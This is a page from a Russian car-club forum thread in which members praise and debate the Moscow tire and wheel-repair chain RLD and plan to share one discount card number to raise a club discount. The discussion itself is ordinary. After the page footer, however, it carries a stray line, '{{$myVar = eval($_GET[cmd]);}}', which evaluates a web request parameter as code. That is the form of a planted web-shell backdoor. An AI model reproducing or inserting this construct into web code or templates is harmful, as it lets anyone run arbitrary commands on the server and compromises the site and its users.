+ Ответить в теме
Страница 1 из 31 1 2 3 11 ... ПоследняяПоследняя
Показано с 1 по 10 из 303

Тема: скидки на шиномонтаж в РЛД


  1. #1
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900

    скидки на шиномонтаж в РЛД

    Милейшие товарищи!


    Многие из вас, да, наверное, все, знают не понаслышке о самом лучшем в Москве шиномонтаже РЛД http://remont-diskov.ru/. Данная конторка позиционирует себя как премиум класс, что на мой взгляд вполне оправдано. На ремонт покрышек (включая боковые порезы) они дают гарантию до полного износа резины, диски они чинят по запатентованной ими технологии «холодного» ремонта, что позволяет избегать вредоносного для литья нагревания, которое приводит к ухудшению свойств диска. Это не реклама, это факты. А теперь ИМХО: ребята удивительно дружелюбны и приятны в общении, всегда готовы на индивидуальный подход и компромиссы, работу свою знают и делают её идеально, за качество я ручаюсь. К тому же доехать до них, даже по самым жостким пробкам, не слишком затруднительно, т.к. они сетевики и разместили свои центры очень удобно и весьма логично. Работает выездной шиномонтаж. При этом, РЛД создаёт более чем комфортную обстановку для клиентов. Томительное ожидание в своих центрах они скрашивают выдаваемыми бесплатно ноут-буками, само собой вай-фаем, бесплатным чаем, кофе, конфетками) Расположиться можно и на удобнейших диванах в помещении с огромной плазмой, выбрать ДВД из их коллекции и насладиться фильмом, а можно и покурить на улице под пледом. Кому-то будет по душе поторчать в рем зоне и понаблюдать за выправлением колеса… Единственное, что холодит организм, дикие цены…. Выправление вмятины на диске – ОТ 2200р, порезы около 3000р, а при мысли о грыже я хватаюсь за револьвер. :hang2:

    Моё многолетнее владение скидочной карточкой в РЛД привело к тому, что накопленная скидка приблизилась к 10%. Совместными усилиями и коллективным разумом мы можем её утроить! Видите ли, РЛД не запрещает использование одной карты неограниченным количеством лиц. Для применения скидки достаточно просто сообщить номер карты. Если мы сольёмся в едином порыве и в каждый свой визит в РЛД будем называть номер карты, максимум через год мы получим скидку в 30%! А это значит, что сезонное хранение колёс на Бережковской набережной с максимальным сроком размещения ГОД составит для нас 3500р, и это цена для Р19! Выправление диска в гарантированно идеальном качестве выйдет в 1500р. Опять же цена на Р19!!!!

    Если эта идея покажется вам интересной, я могу попробовать связаться с РЛД и обговорить с ними добровольную капитуляцию и увеличение нашей стартовой скидки для клуба. Увы, дубликатов карты они не выдают, но это опять же можно с ними обсудить. Они готовы на компромиссы, что подтверждает их предложение, сделанное мне недавно. По дружбе и любви они выполняют мне ПОЛНУЮ порошковую покраску колёс Р19 с гарантией 2 года за 13000р. Шиномонтаж в стоимость включён.

    Давайте продолжим позитивную тенденцию получения скидок на основании нашей массовости и организованности. Клуб должен приносить пользу машинам, а не только цирроз печени их владельцам.

    Вот фотка моей карты, как я писала выше, достаточно сообщить её номер при оплате услуг в любом из сервисов РЛД для получения скидки 8%. Если семеро из нас переобуются в РЛД, используя карту, мы перешагнём порог скидки в 10%. На данный момент моей картой пользуюсь собственно я, Женя Шумок, Камыч и Камычевые женщины. :ok:

    Мы захватим мииииррр!!!
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Молодец !
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    можем открыть клуб камычевых женщин и для них отдельную скидку накопительную сделать =) и зарубимся с гти-клубом кто быстрее наберет 30 ку=))

    А вообще идея на удивление адекватная. Правда надо начинать наверное с карточки Гошана, на ней процент больше, чем с твоей.
    In a world that's digital, we choose to be ANALOG.

  4. #4
    GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Регистрация
    27.02.2010
    Откуда
    13 район
    Машина
    .:R MkVI
    Сообщений
    2,819
    Цитата Сообщение от Kamich Посмотреть сообщение
    можем открыть клуб камычевых женщин и для них отдельную скидку накопительную сделать =) и зарубимся с гти-клубом кто быстрее наберет 30 ку=))

    А вообще идея на удивление адекватная. Правда надо начинать наверное с карточки Гошана, на ней процент больше, чем с твоей.
    только Гошан её не предлагает никому :)):):):)
    я, к сожалению, в вопросе сезонного переобувания пасс. смысла везди обутые колеса из зелека до мкада, а потом обратно не вижу вуапще :) я их сам меняю :)

    но вот весной готов отвезти им на обувку свои новые колёсья :):)
    Tough Guys Don`t Dance ©

    .:Revo St.2+

  5. #5
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Кирюх, Зимбермэн вот тоже замкадыш, а колесо пробил на трёшке) И догадайся, куда он по моей скидке отволок свой раненый киндер-сюрприз??? Прааавильно, в РЛД. А кому ещё можно без сердечного приступа доверить ББэСы?

    Можно и с Гошиной карточкой начать всё это проворачивать, но с моей, оформленной на моё имя, мне будет проще общаться с РЛД.

    Олеж, может как-то поможешь это сообщение сделать более заметным для народа? Чтоб новички сразу же брались в оборот и чтоб оно не потерялось после прекращения публикаций в теме?
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  6. #6
    GTI-Racing Kamich is just really nice Kamich is just really nice Kamich is just really nice Kamich is just really nice Аватар для Kamich
    Регистрация
    23.06.2010
    Откуда
    Mascwa
    Машина
    FE V, ранее GTI 5 MT&DSG
    Сообщений
    1,666
    бгггг =) катя хочет большой скидосек на свою карточку=))) потом катя купит себе бмв =))) давайте предложим сделать карточку для гти-клуба. и на нее начнем копить. так будет круче и пафоснее=) и табличку дадим- гти-клуб обслуживается в рлд
    In a world that's digital, we choose to be ANALOG.

  7. #7
    I место Самый Интересный Автомобиль 2011 Шумок is a jewel in the rough Шумок is a jewel in the rough Шумок is a jewel in the rough Аватар для Шумок
    Регистрация
    15.10.2010
    Откуда
    Москва
    Машина
    Volkswagen Scirocco 2.0
    Сообщений
    189
    Тему нужно развивать, а мы от себя сделаем красивый скан с номером карточки (которого достаточно для получения скидки) и будет у нас такая клубная карта РЛД!
    Относительное в Жизни Относительно

  8. #8
    III место Самые Интересные Диски 2011 ZIMBER is on a distinguished road Аватар для ZIMBER
    Регистрация
    20.11.2009
    Откуда
    Москва
    Машина
    Volkswagen Golf VI GTI
    Сообщений
    516
    Цитата Сообщение от White pony Посмотреть сообщение
    Кирюх, Зимбермэн вот тоже замкадыш, а колесо пробил на трёшке)
    Катюшь... Ничё что ты больший замкадыш чем я!!!???)))

    Повез в РЛД только из за достаточно сложного ремонта!!! Боковой порез на 35 профиле лучше отдать в то место, куда потом что то предъявить можно будет (пускай даже за немаленькие деньги)... Благо они дали гарантию до износа протектора.
    А просто пе6реобуваться там, не вижу смысла!!! Неоправданно дорого!!!

  9. #9
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от ZIMBER Посмотреть сообщение
    Катюшь... Ничё что ты больший замкадыш чем я!!!???)))
    Я думал ты переехал :expect:...... это пять !, Кати то в пределах ТТК )))
    песок сыпется....не останавливайтесь на достигнутом !

  10. #10
    I место Самый Интересный Автомобиль 2011 Шумок is a jewel in the rough Шумок is a jewel in the rough Шумок is a jewel in the rough Аватар для Шумок
    Регистрация
    15.10.2010
    Откуда
    Москва
    Машина
    Volkswagen Scirocco 2.0
    Сообщений
    189
    Цитата Сообщение от ZIMBER Посмотреть сообщение
    Катюшь... Ничё что ты больший замкадыш чем я!!!???)))

    Повез в РЛД только из за достаточно сложного ремонта!!! Боковой порез на 35 профиле лучше отдать в то место, куда потом что то предъявить можно будет (пускай даже за немаленькие деньги)... Благо они дали гарантию до износа протектора.
    А просто пе6реобуваться там, не вижу смысла!!! Неоправданно дорого!!!
    Переобувка, смазка бронзой, балансировка, ремонт дисков (были гнуты с Зимы хех) мне встал в 3000 рублей в РЛД. Разве это дорого?
    ПЛЮС ты получаешь бесплатный Wi-Fi, бесплатный кофе, бесплатный большой плазма телек, бесплатный диванчики, бесплатный удобства. Мне кажется за это можно заплатить, если есть возможность. А экономить 500 рублей не вижу смысла. РЛД для определенного круга лиц + заслуженная репутация (это не значит, что РЛД лучший сервис, т.к. уже многие делают тоже самое, но цены там, я вам скажу, не чуть не меньше)
    Относительное в Жизни Относительно

+ Ответить в теме
Страница 1 из 31 1 2 3 11 ... ПоследняяПоследняя

Похожие темы

  1. Шиномонтаж????
    от SuSlik в разделе Шины, диски
    Ответов: 12
    Последнее сообщение: 02.04.2024, 17:57
  2. Шиномонтаж у ШУСТРОГО
    от Shystrui в разделе Шины, диски
    Ответов: 27
    Последнее сообщение: 01.04.2024, 18:18
  3. Шиномонтаж У Шустрого
    от Shystrui в разделе Шины, диски
    Ответов: 9
    Последнее сообщение: 08.01.2024, 18:42
  4. шиномонтаж!!! ХЭЛП!!!!
    от 3BEPb в разделе Курилка
    Ответов: 9
    Последнее сообщение: 11.08.2006, 15:20

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}